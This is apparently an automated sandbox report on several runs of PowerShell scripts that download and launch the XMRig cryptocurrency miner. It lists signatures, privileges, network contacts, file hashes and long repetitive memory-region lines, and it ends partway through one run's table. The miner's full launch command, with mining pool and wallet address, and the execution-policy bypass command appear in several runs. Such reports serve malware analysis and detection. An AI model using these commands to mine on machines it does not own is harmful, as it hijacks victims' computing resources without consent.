memory/1576-114-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-115-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-116-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-117-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-118-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-119-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-120-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-121-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-122-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-123-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-124-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-125-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-126-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-127-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-128-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-129-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-130-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-131-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-132-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-133-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-134-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-135-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-136-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-137-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-138-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-139-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-140-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-141-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-142-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-143-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-144-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-145-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-146-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-147-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-148-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-149-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-150-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-151-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-152-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-153-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-154-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-155-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win7-20231129-en

Max time kernel

1559s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Network

N/A

Files

memory/1988-4-0x000007FEF534E000-0x000007FEF534F000-memory.dmp

memory/1988-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1988-7-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/1988-6-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1988-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/1988-10-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1988-9-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1988-11-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1988-12-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
NL 52.111.243.31:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/3608-2-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp

memory/3608-5-0x000001E07F6B0000-0x000001E07F6D2000-memory.dmp

memory/3608-6-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

memory/3608-9-0x000001E07F860000-0x000001E07F8D6000-memory.dmp

memory/3608-10-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmbrkdz5.d2k.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3608-25-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

memory/3608-48-0x000001E07F9E0000-0x000001E07F9F2000-memory.dmp

memory/3608-61-0x000001E07F840000-0x000001E07F84A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/780-90-0x0000029463790000-0x00000294637B0000-memory.dmp

memory/780-91-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/3608-92-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp

memory/3608-93-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

memory/780-94-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-95-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-96-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-97-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-98-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-99-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-100-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-101-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-102-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-103-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-104-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-105-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-106-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-107-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-108-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-109-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-110-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-111-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-112-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-113-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-114-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-115-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-116-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-117-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-118-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-119-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-120-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-121-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-122-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-123-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-124-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-125-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-126-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-127-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-128-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-129-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-130-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-131-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-132-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-133-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-134-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-135-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-136-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-137-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-138-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-139-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-140-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-141-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-142-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-143-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-144-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-145-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-146-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-147-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-148-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-149-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-150-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-151-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-152-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-153-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-154-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

memory/780-155-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:23

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/4728-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2tepunc.5yf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4728-9-0x000002B9CD4C0000-0x000002B9CD4E2000-memory.dmp

memory/4728-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-14-0x000002B9E59B0000-0x000002B9E59C2000-memory.dmp

memory/4728-15-0x000002B9CD4F0000-0x000002B9CD4FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4320-46-0x000001A46FA50000-0x000001A46FA70000-memory.dmp

memory/4320-47-0x000001A471450000-0x000001A471470000-memory.dmp

memory/4320-48-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4728-49-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4320-50-0x000001A471470000-0x000001A471490000-memory.dmp

memory/4320-51-0x000001A471490000-0x000001A4714B0000-memory.dmp

memory/4728-53-0x00007FFD97883000-0x00007FFD97885000-memory.dmp

memory/4320-52-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-54-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-55-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-56-0x000001A471470000-0x000001A471490000-memory.dmp

memory/4320-57-0x000001A471490000-0x000001A4714B0000-memory.dmp

memory/4320-58-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-59-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-60-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-61-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-62-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-63-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-64-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-65-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-66-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-67-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-68-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-69-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-70-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-71-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-72-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-73-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-74-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-75-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-76-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-77-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-78-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-79-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-80-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-81-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-82-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-83-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-84-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-85-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-86-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-87-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-88-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-89-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-90-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-91-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-92-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-93-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-94-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-95-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-96-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-97-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-98-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-99-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-100-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-101-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-102-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-103-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-104-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-105-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-106-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-107-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-108-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-109-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-110-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-111-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-112-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-113-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-114-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-115-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

memory/4320-116-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:35

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
